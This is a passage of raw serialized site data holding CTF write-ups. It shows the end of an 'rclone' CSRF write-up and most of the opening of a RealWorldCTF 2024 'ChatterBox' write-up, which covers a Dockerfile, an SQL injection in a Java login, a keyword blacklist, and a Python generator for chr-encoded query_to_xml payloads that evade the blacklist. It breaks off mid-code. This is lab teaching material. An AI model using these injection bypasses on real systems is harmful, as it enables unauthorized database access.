28,"props":25167,"children":25168},{"style":1576},[25169],{"type":38,"value":14844},{"type":33,"tag":128,"props":25171,"children":25172},{"style":312},[25173],{"type":38,"value":6097},{"type":33,"tag":47,"props":25175,"children":25176},{},[25177],{"type":38,"value":25178},"Same as before, we need to create another CSRF to trigger the command.",{"type":33,"tag":47,"props":25180,"children":25181},{},[25182],{"type":38,"value":25183},"We now just need to host these files on a site that the bot can access and submit the URL to the bot.",{"type":33,"tag":47,"props":25185,"children":25186},{},[25187],{"type":38,"value":25188},"And our webhook will receive the flag:",{"type":33,"tag":75,"props":25190,"children":25192},{"imgSrc":25191},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721248952/writeups/rclone/flag_webhook.webp",[],{"type":33,"tag":5227,"props":25194,"children":25195},{},[25196],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":25198},[25199,25200,25201,25202,25203],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":23885,"depth":362,"text":23888},{"id":24069,"depth":362,"text":24072},{"id":21053,"depth":362,"text":21056},"content:writeups:rclone.md","writeups/rclone.md","writeups/rclone",{"_path":25208,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":25209,"description":8,"head":25210,"body":25228,"_type":5240,"_id":29225,"_source":5242,"_file":29226,"_stem":29227,"_extension":5245},"/writeups/chatter-box","ChatterBox",{"title":25211,"description":25212,"keywords":25213,"slug":25214,"image":25215,"date":25216,"meta":25217},"ChatterBox [UNINTENDED]","ChatterBox was a medium web challenge from RealWorldCTF 
2024.","web,sqli,rce","chatter-box","https://res.cloudinary.com/dmju5zuhr/image/upload/v1706549525/writeups/real_world_ctf.webp","2024-01-27",[25218,25219,25220,25221,25222,25224,25225,25226],{"og:image":25215},{"og:title":25211},{"og:description":25212},{"og:type":21},{"og:url":25223},"https://owalid.com/chatter-box",{"description":25212},{"title":25211},{"keywords":25227},"web,sqli,rce,realworldctf,realworld,ctf,ChatterBox",{"type":30,"children":25229,"toc":29218},[25230,25235,25239,25243,25248,25252,25257,25497,25501,25505,25510,25534,25539,25545,25550,25622,25627,25631,25637,25642,25647,25659,25664,25669,25673,25678,25683,25688,25912,25918,25923,25936,26342,26347,26903,26929,26934,26946,27354,27359,27364,27439,27460,27486,27491,27502,27522,27572,27584,27589,27600,27612,27623,27628,27674,27679,27683,27689,27694,27705,27725,27730,27735,27741,27746,27751,27770,27775,27796,27807,27812,27817,27821,27826,27831,27843,27848,27852,27857,27862,27910,27915,27919,27924,27929,27994,27998,28002,28015,28020,28085,28090,28094,28099,28107,28590,28598,29037,29045,29185,29205,29210,29214],{"type":33,"tag":34,"props":25231,"children":25233},{"id":25232},"chatterbox",[25234],{"type":38,"value":25209},{"type":33,"tag":40,"props":25236,"children":25237},{"id":42},[25238],{"type":38,"value":45},{"type":33,"tag":47,"props":25240,"children":25241},{},[25242],{"type":38,"value":25212},{"type":33,"tag":47,"props":25244,"children":25245},{},[25246],{"type":38,"value":25247},"We have the compiled source code in the form of a .jar file.",{"type":33,"tag":75,"props":25249,"children":25251},{"imgSrc":25250,":width":5304},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558660/writeups/chatter-box/files.webp",[],{"type":33,"tag":47,"props":25253,"children":25254},{},[25255],{"type":38,"value":25256},"If we look at the dockerfile in detail, we can see that an elf file /readflag is copied so we can therefore say that the goal of the challenge is to rce on the target 
server",{"type":33,"tag":114,"props":25258,"children":25259},{"lang":9966},[25260],{"type":33,"tag":119,"props":25261,"children":25263},{"code":25262,"language":9966,"meta":8,"className":22917,"style":8},"FROM openjdk:17-slim\n\nRUN apt update \\\n    && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\nRUN apt install -y libfindbin-libs-perl acl haveged\nRUN mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n\nCOPY init.sql /\nCOPY payload.c /tmp/\n\nUSER root\nUSER root\n\nCOPY ChatterBox-0.0.1-SNAPSHOT.jar /\nCOPY readflag /\nCOPY flag /\n\nRUN chmod 000 /flag\nCOPY start.sh /\nRUN chmod +x /start.sh\nENTRYPOINT [\"/start.sh\"]\n",[25264],{"type":33,"tag":105,"props":25265,"children":25266},{"__ignoreMap":8},[25267,25279,25286,25298,25306,25318,25330,25337,25349,25361,25368,25380,25391,25398,25410,25422,25434,25441,25453,25465,25477],{"type":33,"tag":128,"props":25268,"children":25269},{"class":130,"line":131},[25270,25274],{"type":33,"tag":128,"props":25271,"children":25272},{"style":1576},[25273],{"type":38,"value":22929},{"type":33,"tag":128,"props":25275,"children":25276},{"style":323},[25277],{"type":38,"value":25278}," openjdk:17-slim\n",{"type":33,"tag":128,"props":25280,"children":25281},{"class":130,"line":362},[25282],{"type":33,"tag":128,"props":25283,"children":25284},{"emptyLinePlaceholder":896},[25285],{"type":38,"value":899},{"type":33,"tag":128,"props":25287,"children":25288},{"class":130,"line":403},[25289,25293],{"type":33,"tag":128,"props":25290,"children":25291},{"style":1576},[25292],{"type":38,"value":22949},{"type":33,"tag":128,"props":25294,"children":25295},{"style":323},[25296],{"type":38,"value":25297}," apt update \\\n",{"type":33,"tag":128,"props":25299,"children":25300},{"class":130,"line":739},[25301],{"type":33,"tag":128,"props":25302,"children":25303},{"style":323},[25304],{"type":38,"value":25305},"    && 
apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\n",{"type":33,"tag":128,"props":25307,"children":25308},{"class":130,"line":765},[25309,25313],{"type":33,"tag":128,"props":25310,"children":25311},{"style":1576},[25312],{"type":38,"value":22949},{"type":33,"tag":128,"props":25314,"children":25315},{"style":323},[25316],{"type":38,"value":25317}," apt install -y libfindbin-libs-perl acl haveged\n",{"type":33,"tag":128,"props":25319,"children":25320},{"class":130,"line":804},[25321,25325],{"type":33,"tag":128,"props":25322,"children":25323},{"style":1576},[25324],{"type":38,"value":22949},{"type":33,"tag":128,"props":25326,"children":25327},{"style":323},[25328],{"type":38,"value":25329}," mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n",{"type":33,"tag":128,"props":25331,"children":25332},{"class":130,"line":839},[25333],{"type":33,"tag":128,"props":25334,"children":25335},{"emptyLinePlaceholder":896},[25336],{"type":38,"value":899},{"type":33,"tag":128,"props":25338,"children":25339},{"class":130,"line":848},[25340,25344],{"type":33,"tag":128,"props":25341,"children":25342},{"style":1576},[25343],{"type":38,"value":23093},{"type":33,"tag":128,"props":25345,"children":25346},{"style":323},[25347],{"type":38,"value":25348}," init.sql /\n",{"type":33,"tag":128,"props":25350,"children":25351},{"class":130,"line":976},[25352,25356],{"type":33,"tag":128,"props":25353,"children":25354},{"style":1576},[25355],{"type":38,"value":23093},{"type":33,"tag":128,"props":25357,"children":25358},{"style":323},[25359],{"type":38,"value":25360}," payload.c 
/tmp/\n",{"type":33,"tag":128,"props":25362,"children":25363},{"class":130,"line":988},[25364],{"type":33,"tag":128,"props":25365,"children":25366},{"emptyLinePlaceholder":896},[25367],{"type":38,"value":899},{"type":33,"tag":128,"props":25369,"children":25370},{"class":130,"line":1001},[25371,25375],{"type":33,"tag":128,"props":25372,"children":25373},{"style":1576},[25374],{"type":38,"value":23137},{"type":33,"tag":128,"props":25376,"children":25377},{"style":323},[25378],{"type":38,"value":25379}," root\n",{"type":33,"tag":128,"props":25381,"children":25382},{"class":130,"line":1014},[25383,25387],{"type":33,"tag":128,"props":25384,"children":25385},{"style":1576},[25386],{"type":38,"value":23137},{"type":33,"tag":128,"props":25388,"children":25389},{"style":323},[25390],{"type":38,"value":25379},{"type":33,"tag":128,"props":25392,"children":25393},{"class":130,"line":1026},[25394],{"type":33,"tag":128,"props":25395,"children":25396},{"emptyLinePlaceholder":896},[25397],{"type":38,"value":899},{"type":33,"tag":128,"props":25399,"children":25400},{"class":130,"line":1038},[25401,25405],{"type":33,"tag":128,"props":25402,"children":25403},{"style":1576},[25404],{"type":38,"value":23093},{"type":33,"tag":128,"props":25406,"children":25407},{"style":323},[25408],{"type":38,"value":25409}," ChatterBox-0.0.1-SNAPSHOT.jar /\n",{"type":33,"tag":128,"props":25411,"children":25412},{"class":130,"line":1051},[25413,25417],{"type":33,"tag":128,"props":25414,"children":25415},{"style":1576},[25416],{"type":38,"value":23093},{"type":33,"tag":128,"props":25418,"children":25419},{"style":323},[25420],{"type":38,"value":25421}," readflag /\n",{"type":33,"tag":128,"props":25423,"children":25424},{"class":130,"line":1063},[25425,25429],{"type":33,"tag":128,"props":25426,"children":25427},{"style":1576},[25428],{"type":38,"value":23093},{"type":33,"tag":128,"props":25430,"children":25431},{"style":323},[25432],{"type":38,"value":25433}," flag 
/\n",{"type":33,"tag":128,"props":25435,"children":25436},{"class":130,"line":1076},[25437],{"type":33,"tag":128,"props":25438,"children":25439},{"emptyLinePlaceholder":896},[25440],{"type":38,"value":899},{"type":33,"tag":128,"props":25442,"children":25443},{"class":130,"line":1089},[25444,25448],{"type":33,"tag":128,"props":25445,"children":25446},{"style":1576},[25447],{"type":38,"value":22949},{"type":33,"tag":128,"props":25449,"children":25450},{"style":323},[25451],{"type":38,"value":25452}," chmod 000 /flag\n",{"type":33,"tag":128,"props":25454,"children":25455},{"class":130,"line":1101},[25456,25460],{"type":33,"tag":128,"props":25457,"children":25458},{"style":1576},[25459],{"type":38,"value":23093},{"type":33,"tag":128,"props":25461,"children":25462},{"style":323},[25463],{"type":38,"value":25464}," start.sh /\n",{"type":33,"tag":128,"props":25466,"children":25467},{"class":130,"line":1114},[25468,25472],{"type":33,"tag":128,"props":25469,"children":25470},{"style":1576},[25471],{"type":38,"value":22949},{"type":33,"tag":128,"props":25473,"children":25474},{"style":323},[25475],{"type":38,"value":25476}," chmod +x 
/start.sh\n",{"type":33,"tag":128,"props":25478,"children":25479},{"class":130,"line":1127},[25480,25484,25488,25493],{"type":33,"tag":128,"props":25481,"children":25482},{"style":1576},[25483],{"type":38,"value":23157},{"type":33,"tag":128,"props":25485,"children":25486},{"style":323},[25487],{"type":38,"value":718},{"type":33,"tag":128,"props":25489,"children":25490},{"style":140},[25491],{"type":38,"value":25492},"\"/start.sh\"",{"type":33,"tag":128,"props":25494,"children":25495},{"style":323},[25496],{"type":38,"value":3262},{"type":33,"tag":40,"props":25498,"children":25499},{"id":22881},[25500],{"type":38,"value":22884},{"type":33,"tag":75,"props":25502,"children":25504},{"imgSrc":25503,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558732/writeups/chatter-box/files_decompiled.webp",[],{"type":33,"tag":47,"props":25506,"children":25507},{},[25508],{"type":38,"value":25509},"After decompiling the .jar file, we can see that there are 3 controllers:",{"type":33,"tag":239,"props":25511,"children":25512},{},[25513,25518,25523],{"type":33,"tag":243,"props":25514,"children":25515},{},[25516],{"type":38,"value":25517},"LoginController: This controller allows a user to connect.",{"type":33,"tag":243,"props":25519,"children":25520},{},[25521],{"type":38,"value":25522},"MessageBoardController: Allows adding a message to the database and displaying the list of messages.",{"type":33,"tag":243,"props":25524,"children":25525},{},[25526,25528],{"type":38,"value":25527},"NotifyController: Allows rendering an html file via the filename passed as parameter ",{"type":33,"tag":105,"props":25529,"children":25531},{"className":25530},[],[25532],{"type":38,"value":25533},"fname",{"type":33,"tag":47,"props":25535,"children":25536},{},[25537],{"type":38,"value":25538},"In the initialization of the database, we can see that there is an admin user with the id 1. 
Once connected, this user is able to interact with the two controllers \"MessageBoardController\" and \"NotifyController\".",{"type":33,"tag":40,"props":25540,"children":25542},{"id":25541},"sql-injection",[25543],{"type":38,"value":25544},"SQL Injection",{"type":33,"tag":47,"props":25546,"children":25547},{},[25548],{"type":38,"value":25549},"By looking in detail at the Login controller, we can see that the endpoint allowing the user to connect contains an SQL injection, since the username is concatenated directly into the query string instead of being bound as a parameter.",{"type":33,"tag":114,"props":25551,"children":25553},{"lang":25552},"java",[25554],{"type":33,"tag":119,"props":25555,"children":25558},{"code":25556,"language":25552,"meta":8,"className":25557,"style":8},"String sql = \"SELECT id,passwd FROM message_users WHERE username = '\" + username + \"'\";\n","language-java shiki shiki-themes vitesse-dark",[25559],{"type":33,"tag":105,"props":25560,"children":25561},{"__ignoreMap":8},[25562],{"type":33,"tag":128,"props":25563,"children":25564},{"class":130,"line":131},[25565,25570,25575,25579,25583,25588,25592,25596,25601,25606,25610,25614,25618],{"type":33,"tag":128,"props":25566,"children":25567},{"style":323},[25568],{"type":38,"value":25569},"String",{"type":33,"tag":128,"props":25571,"children":25572},{"style":306},[25573],{"type":38,"value":25574}," sql",{"type":33,"tag":128,"props":25576,"children":25577},{"style":312},[25578],{"type":38,"value":5657},{"type":33,"tag":128,"props":25580,"children":25581},{"style":676},[25582],{"type":38,"value":679},{"type":33,"tag":128,"props":25584,"children":25585},{"style":140},[25586],{"type":38,"value":25587},"SELECT id,passwd FROM message_users WHERE username = '",{"type":33,"tag":128,"props":25589,"children":25590},{"style":676},[25591],{"type":38,"value":669},{"type":33,"tag":128,"props":25593,"children":25594},{"style":300},[25595],{"type":38,"value":8297},{"type":33,"tag":128,"props":25597,"children":25598},{"style":323},[25599],{"type":38,"value":25600}," username 
",{"type":33,"tag":128,"props":25602,"children":25603},{"style":300},[25604],{"type":38,"value":25605},"+",{"type":33,"tag":128,"props":25607,"children":25608},{"style":676},[25609],{"type":38,"value":679},{"type":33,"tag":128,"props":25611,"children":25612},{"style":140},[25613],{"type":38,"value":6040},{"type":33,"tag":128,"props":25615,"children":25616},{"style":676},[25617],{"type":38,"value":669},{"type":33,"tag":128,"props":25619,"children":25620},{"style":312},[25621],{"type":38,"value":5676},{"type":33,"tag":47,"props":25623,"children":25624},{},[25625],{"type":38,"value":25626},"The only problem is that we have to bypass several checks:",{"type":33,"tag":75,"props":25628,"children":25630},{"imgSrc":25629},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558895/writeups/chatter-box/login_controller.webp",[],{"type":33,"tag":81,"props":25632,"children":25634},{"id":25633},"bypass-first-check-blacklist",[25635],{"type":38,"value":25636},"Bypass first check (blacklist)",{"type":33,"tag":47,"props":25638,"children":25639},{},[25640],{"type":38,"value":25641},"The first check is a blacklist check.",{"type":33,"tag":47,"props":25643,"children":25644},{},[25645],{"type":38,"value":25646},"The blacklist covers a large share of the keywords usable in an 
injection.",{"type":33,"tag":114,"props":25648,"children":25650},{"lang":25649},"txt",[25651],{"type":33,"tag":119,"props":25652,"children":25654},{"code":25653},"\"SELECT\",\"UNION\",\"INSERT\",\"ALTER\",\"SLEEP\",\"DELETE\",\"--\",\";\",\"#\",\"&\",\"/*\",\"OR\",\"EXEC\",\"CREATE\",\"AND\",\"DROP\",\n\"DO\",\"COPY\",\"SET\",\"VACUUM\",\"SHOW\",\"CURSOR\",\"TRUNCATE\",\"CAST\",\"BEGIN\",\"PERFORM\",\"END\",\"CASE\",\"WHEN\",\"ALL\",\n\"TABLE\",\"UPDATE\",\"TRIGGER\",\"FUNCTION\",\"PROCEDURE\",\"DECLARE\",\"RETURNING\",\"TABLESPACE\",\"VIEW\",\"SEQUENCE\",\n\"INDEX\",\"LOCK\",\"GRANT\",\"REVOKE\",\"SAVEPOINT\",\"ROLLBACK\",\"IMPORT\",\"COMMIT\",\"PREPARE\",\"EXECUTE\",\"EXPLAIN\",\n\"ANALYZE\",\"DATABASE\",\"PASSWORD\",\"CONNECT\",\"DISCONNECT\",\"PG_SLEEP\",\"MERGE\",\"USING\",\"LIMIT\",\"OFFSET\",\"RETURN\",\n\"ESCAPE\",\"LIKE\",\"ILIKE\",\"RLIKE\",\"EXISTS\",\"BETWEEN\",\"IS\",\"NULL\",\"NOT\",\"GROUP\",\"BY\",\"HAVING\",\"ORDER\",\"WINDOW\",\n\"PARTITION\",\"OVER\",\"FOREIGN KEY\",\"REFERENCE\",\"RAISE\",\"LISTEN\",\"NOTIFY\",\"LOAD\",\"SECURITY\",\"OWNER\",\"RULE\",\n\"CLUSTER\",\"COMMENT\",\"CONVERT\",\"COPY\",\"CHECKPOINT\",\"REINDEX\",\"RESET\",\"LANGUAGE\",\"PLPGSQL\",\"PLPYTHON\",\n\"SECDEF\",\"NOCREATEDB\",\"NOCREATEROLE\",\"NOINHERIT\",\"NOREPLICATION\",\"BYPASSRLS\",\"FILE\",\"PG_\",\"IMPORT\",\"EXPORT\"\n",[25655],{"type":33,"tag":105,"props":25656,"children":25657},{"__ignoreMap":8},[25658],{"type":38,"value":25653},{"type":33,"tag":47,"props":25660,"children":25661},{},[25662],{"type":38,"value":25663},"One of the most restrictive things is that in the blacklist, it is forbidden to use comments.",{"type":33,"tag":47,"props":25665,"children":25666},{},[25667],{"type":38,"value":25668},"We need to use a postgresql function that would allow us to execute a query without it being in the 
blacklist.",{"type":33,"tag":75,"props":25670,"children":25672},{"imgSrc":25671},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558929/writeups/chatter-box/doc_query_to_xml.webp",[],{"type":33,"tag":47,"props":25674,"children":25675},{},[25676],{"type":38,"value":25677},"As shown in the PostgreSQL documentation, the query_to_xml function executes the query passed as a parameter and returns the result in XML format.",{"type":33,"tag":47,"props":25679,"children":25680},{},[25681],{"type":38,"value":25682},"And bingo !!! This function is not on the blacklist.",{"type":33,"tag":47,"props":25684,"children":25685},{},[25686],{"type":38,"value":25687},"For convenience, here is a small Python script that generates a payload from a SQL query by encoding the query with CHR.",{"type":33,"tag":114,"props":25689,"children":25690},{"lang":10227},[25691],{"type":33,"tag":119,"props":25692,"children":25694},{"code":25693,"language":10227,"meta":8,"className":10231,"style":8},"def get_payload(query):\n    payload_chr = [\"||\".join(f\"chr({ord(query[i])})\" for i in range(0, len(query)))][0]\n    print(f\"'query_to_xml({payload_chr},true,true,'')'\")\n",[25695],{"type":33,"tag":105,"props":25696,"children":25697},{"__ignoreMap":8},[25698,25722,25870],{"type":33,"tag":128,"props":25699,"children":25700},{"class":130,"line":131},[25701,25705,25710,25714,25718],{"type":33,"tag":128,"props":25702,"children":25703},{"style":300},[25704],{"type":38,"value":10402},{"type":33,"tag":128,"props":25706,"children":25707},{"style":135},[25708],{"type":38,"value":25709}," 
get_payload",{"type":33,"tag":128,"props":25711,"children":25712},{"style":312},[25713],{"type":38,"value":5566},{"type":33,"tag":128,"props":25715,"children":25716},{"style":323},[25717],{"type":38,"value":5810},{"type":33,"tag":128,"props":25719,"children":25720},{"style":312},[25721],{"type":38,"value":10497},{"type":33,"tag":128,"props":25723,"children":25724},{"class":130,"line":362},[25725,25730,25734,25738,25742,25747,25751,25755,25760,25764,25768,25773,25777,25782,25786,25790,25794,25798,25803,25807,25812,25817,25822,25827,25832,25836,25840,25844,25849,25853,25857,25862,25866],{"type":33,"tag":128,"props":25726,"children":25727},{"style":323},[25728],{"type":38,"value":25729},"    payload_chr ",{"type":33,"tag":128,"props":25731,"children":25732},{"style":312},[25733],{"type":38,"value":315},{"type":33,"tag":128,"props":25735,"children":25736},{"style":312},[25737],{"type":38,"value":718},{"type":33,"tag":128,"props":25739,"children":25740},{"style":676},[25741],{"type":38,"value":669},{"type":33,"tag":128,"props":25743,"children":25744},{"style":140},[25745],{"type":38,"value":25746},"||",{"type":33,"tag":128,"props":25748,"children":25749},{"style":676},[25750],{"type":38,"value":669},{"type":33,"tag":128,"props":25752,"children":25753},{"style":312},[25754],{"type":38,"value":215},{"type":33,"tag":128,"props":25756,"children":25757},{"style":323},[25758],{"type":38,"value":25759},"join",{"type":33,"tag":128,"props":25761,"children":25762},{"style":312},[25763],{"type":38,"value":5566},{"type":33,"tag":128,"props":25765,"children":25766},{"style":300},[25767],{"type":38,"value":11107},{"type":33,"tag":128,"props":25769,"children":25770},{"style":140},[25771],{"type":38,"value":25772},"\"chr(",{"type":33,"tag":128,"props":25774,"children":25775},{"style":151},[25776],{"type":38,"value":7246},{"type":33,"tag":128,"props":25778,"children":25779},{"style":437},[25780],{"type":38,"value":25781},"ord",{"type":33,"tag":128,"props":25783,"children":25784},{"style"
:312},[25785],{"type":38,"value":5566},{"type":33,"tag":128,"props":25787,"children":25788},{"style":323},[25789],{"type":38,"value":5810},{"type":33,"tag":128,"props":25791,"children":25792},{"style":312},[25793],{"type":38,"value":344},{"type":33,"tag":128,"props":25795,"children":25796},{"style":323},[25797],{"type":38,"value":6110},{"type":33,"tag":128,"props":25799,"children":25800},{"style":312},[25801],{"type":38,"value":25802},"])",{"type":33,"tag":128,"props":25804,"children":25805},{"style":151},[25806],{"type":38,"value":5730},{"type":33,"tag":128,"props":25808,"children":25809},{"style":140},[25810],{"type":38,"value":25811},")\"",{"type":33,"tag":128,"props":25813,"children":25814},{"style":1576},[25815],{"type":38,"value":25816}," for",{"type":33,"tag":128,"props":25818,"children":25819},{"style":323},[25820],{"type":38,"value":25821}," i ",{"type":33,"tag":128,"props":25823,"children":25824},{"style":1576},[25825],{"type":38,"value":25826},"in",{"type":33,"tag":128,"props":25828,"children":25829},{"style":437},[25830],{"type":38,"value":25831}," range",{"type":33,"tag":128,"props":25833,"children":25834},{"style":312},[25835],{"type":38,"value":5566},{"type":33,"tag":128,"props":25837,"children":25838},{"style":523},[25839],{"type":38,"value":10442},{"type":33,"tag":128,"props":25841,"children":25842},{"style":312},[25843],{"type":38,"value":5584},{"type":33,"tag":128,"props":25845,"children":25846},{"style":437},[25847],{"type":38,"value":25848}," 
len",{"type":33,"tag":128,"props":25850,"children":25851},{"style":312},[25852],{"type":38,"value":5566},{"type":33,"tag":128,"props":25854,"children":25855},{"style":323},[25856],{"type":38,"value":5810},{"type":33,"tag":128,"props":25858,"children":25859},{"style":312},[25860],{"type":38,"value":25861},")))][",{"type":33,"tag":128,"props":25863,"children":25864},{"style":523},[25865],{"type":38,"value":10442},{"type":33,"tag":128,"props":25867,"children":25868},{"style":312},[25869],{"type":38,"value":3262},{"type":33,"tag":128,"props":25871,"children":25872},{"class":130,"line":403},[25873,25877,25881,25885,25890,25894,25899,25903,25908],{"type":33,"tag":128,"props":25874,"children":25875},{"style":437},[25876],{"type":38,"value":10650},{"type":33,"tag":128,"props":25878,"children":25879},{"style":312},[25880],{"type":38,"value":5566},{"type":33,"tag":128,"props":25882,"children":25883},{"style":300},[25884],{"type":38,"value":11107},{"type":33,"tag":128,"props":25886,"children":25887},{"style":140},[25888],{"type":38,"value":25889},"\"'query_to_xml(",{"type":33,"tag":128,"props":25891,"children":25892},{"style":151},[25893],{"type":38,"value":7246},{"type":33,"tag":128,"props":25895,"children":25896},{"style":323},[25897],{"type":38,"value":25898},"payload_chr",{"type":33,"tag":128,"props":25900,"children":25901},{"style":151},[25902],{"type":38,"value":5730},{"type":33,"tag":128,"props":25904,"children":25905},{"style":140},[25906],{"type":38,"value":25907},",true,true,'')'\"",{"type":33,"tag":128,"props":25909,"children":25910},{"style":312},[25911],{"type":38,"value":2427},{"type":33,"tag":81,"props":25913,"children":25915},{"id":25914},"bypass-second-check",[25916],{"type":38,"value":25917},"Bypass second check",{"type":33,"tag":47,"props":25919,"children":25920},{},[25921],{"type":38,"value":25922},"So now we have a function that executes the query we want. 
But the problem now is that another check is applied after the blacklist.",{"type":33,"tag":47,"props":25924,"children":25925},{},[25926,25928,25934],{"type":38,"value":25927},"The second filter will call the ",{"type":33,"tag":105,"props":25929,"children":25931},{"className":25930},[],[25932],{"type":38,"value":25933},"parse",{"type":38,"value":25935}," function. This function performs a check that depends on whether the query is of type 'select' or 'insert'.",{"type":33,"tag":114,"props":25937,"children":25938},{"lang":25552},[25939],{"type":33,"tag":119,"props":25940,"children":25942},{"code":25941,"language":25552,"meta":8,"className":25557,"style":8},"public static boolean parse(String sql) {\n  try {\n      CCJSqlParserManager parserManager = new CCJSqlParserManager();\n      Statement statement = parserManager.parse(new StringReader(sql));\n      if (statement instanceof Select) {\n        return processSelect((Select)statement);\n      } else {\n        return statement instanceof Insert ? 
processInsert((Insert)statement) : false;\n      }\n  } catch (Exception var3) {\n    var3.printStackTrace();\n      throw new SQLException(\"SQL error\");\n  }\n}\n",[25943],{"type":33,"tag":105,"props":25944,"children":25945},{"__ignoreMap":8},[25946,25986,25997,26027,26082,26116,26150,26165,26229,26236,26269,26290,26328,26335],{"type":33,"tag":128,"props":25947,"children":25948},{"class":130,"line":131},[25949,25954,25959,25964,25969,25973,25978,25982],{"type":33,"tag":128,"props":25950,"children":25951},{"style":300},[25952],{"type":38,"value":25953},"public",{"type":33,"tag":128,"props":25955,"children":25956},{"style":300},[25957],{"type":38,"value":25958}," static",{"type":33,"tag":128,"props":25960,"children":25961},{"style":300},[25962],{"type":38,"value":25963}," boolean",{"type":33,"tag":128,"props":25965,"children":25966},{"style":135},[25967],{"type":38,"value":25968}," parse",{"type":33,"tag":128,"props":25970,"children":25971},{"style":312},[25972],{"type":38,"value":5566},{"type":33,"tag":128,"props":25974,"children":25975},{"style":323},[25976],{"type":38,"value":25977},"String sql",{"type":33,"tag":128,"props":25979,"children":25980},{"style":312},[25981],{"type":38,"value":2966},{"type":33,"tag":128,"props":25983,"children":25984},{"style":312},[25985],{"type":38,"value":762},{"type":33,"tag":128,"props":25987,"children":25988},{"class":130,"line":362},[25989,25993],{"type":33,"tag":128,"props":25990,"children":25991},{"style":1576},[25992],{"type":38,"value":5684},{"type":33,"tag":128,"props":25994,"children":25995},{"style":312},[25996],{"type":38,"value":762},{"type":33,"tag":128,"props":25998,"children":25999},{"class":130,"line":403},[26000,26005,26010,26014,26018,26023],{"type":33,"tag":128,"props":26001,"children":26002},{"style":323},[26003],{"type":38,"value":26004},"      CCJSqlParserManager",{"type":33,"tag":128,"props":26006,"children":26007},{"style":306},[26008],{"type":38,"value":26009}," 
parserManager",{"type":33,"tag":128,"props":26011,"children":26012},{"style":312},[26013],{"type":38,"value":5657},{"type":33,"tag":128,"props":26015,"children":26016},{"style":1576},[26017],{"type":38,"value":13061},{"type":33,"tag":128,"props":26019,"children":26020},{"style":135},[26021],{"type":38,"value":26022}," CCJSqlParserManager",{"type":33,"tag":128,"props":26024,"children":26025},{"style":312},[26026],{"type":38,"value":15496},{"type":33,"tag":128,"props":26028,"children":26029},{"class":130,"line":739},[26030,26035,26040,26044,26048,26052,26056,26060,26065,26070,26074,26078],{"type":33,"tag":128,"props":26031,"children":26032},{"style":323},[26033],{"type":38,"value":26034},"      Statement",{"type":33,"tag":128,"props":26036,"children":26037},{"style":306},[26038],{"type":38,"value":26039}," statement",{"type":33,"tag":128,"props":26041,"children":26042},{"style":312},[26043],{"type":38,"value":5657},{"type":33,"tag":128,"props":26045,"children":26046},{"style":306},[26047],{"type":38,"value":26009},{"type":33,"tag":128,"props":26049,"children":26050},{"style":312},[26051],{"type":38,"value":215},{"type":33,"tag":128,"props":26053,"children":26054},{"style":135},[26055],{"type":38,"value":25933},{"type":33,"tag":128,"props":26057,"children":26058},{"style":312},[26059],{"type":38,"value":5566},{"type":33,"tag":128,"props":26061,"children":26062},{"style":1576},[26063],{"type":38,"value":26064},"new",{"type":33,"tag":128,"props":26066,"children":26067},{"style":135},[26068],{"type":38,"value":26069}," 
StringReader",{"type":33,"tag":128,"props":26071,"children":26072},{"style":312},[26073],{"type":38,"value":5566},{"type":33,"tag":128,"props":26075,"children":26076},{"style":323},[26077],{"type":38,"value":10492},{"type":33,"tag":128,"props":26079,"children":26080},{"style":312},[26081],{"type":38,"value":9722},{"type":33,"tag":128,"props":26083,"children":26084},{"class":130,"line":765},[26085,26089,26093,26098,26103,26108,26112],{"type":33,"tag":128,"props":26086,"children":26087},{"style":1576},[26088],{"type":38,"value":13561},{"type":33,"tag":128,"props":26090,"children":26091},{"style":312},[26092],{"type":38,"value":2852},{"type":33,"tag":128,"props":26094,"children":26095},{"style":323},[26096],{"type":38,"value":26097},"statement ",{"type":33,"tag":128,"props":26099,"children":26100},{"style":300},[26101],{"type":38,"value":26102},"instanceof",{"type":33,"tag":128,"props":26104,"children":26105},{"style":323},[26106],{"type":38,"value":26107}," Select",{"type":33,"tag":128,"props":26109,"children":26110},{"style":312},[26111],{"type":38,"value":2966},{"type":33,"tag":128,"props":26113,"children":26114},{"style":312},[26115],{"type":38,"value":762},{"type":33,"tag":128,"props":26117,"children":26118},{"class":130,"line":804},[26119,26123,26128,26132,26137,26141,26146],{"type":33,"tag":128,"props":26120,"children":26121},{"style":1576},[26122],{"type":38,"value":13615},{"type":33,"tag":128,"props":26124,"children":26125},{"style":135},[26126],{"type":38,"value":26127}," 
processSelect",{"type":33,"tag":128,"props":26129,"children":26130},{"style":312},[26131],{"type":38,"value":13071},{"type":33,"tag":128,"props":26133,"children":26134},{"style":323},[26135],{"type":38,"value":26136},"Select",{"type":33,"tag":128,"props":26138,"children":26139},{"style":312},[26140],{"type":38,"value":2966},{"type":33,"tag":128,"props":26142,"children":26143},{"style":323},[26144],{"type":38,"value":26145},"statement",{"type":33,"tag":128,"props":26147,"children":26148},{"style":312},[26149],{"type":38,"value":5815},{"type":33,"tag":128,"props":26151,"children":26152},{"class":130,"line":839},[26153,26157,26161],{"type":33,"tag":128,"props":26154,"children":26155},{"style":312},[26156],{"type":38,"value":17786},{"type":33,"tag":128,"props":26158,"children":26159},{"style":1576},[26160],{"type":38,"value":14269},{"type":33,"tag":128,"props":26162,"children":26163},{"style":312},[26164],{"type":38,"value":762},{"type":33,"tag":128,"props":26166,"children":26167},{"class":130,"line":848},[26168,26172,26177,26181,26186,26190,26195,26199,26204,26208,26212,26216,26221,26225],{"type":33,"tag":128,"props":26169,"children":26170},{"style":1576},[26171],{"type":38,"value":13615},{"type":33,"tag":128,"props":26173,"children":26174},{"style":323},[26175],{"type":38,"value":26176}," statement 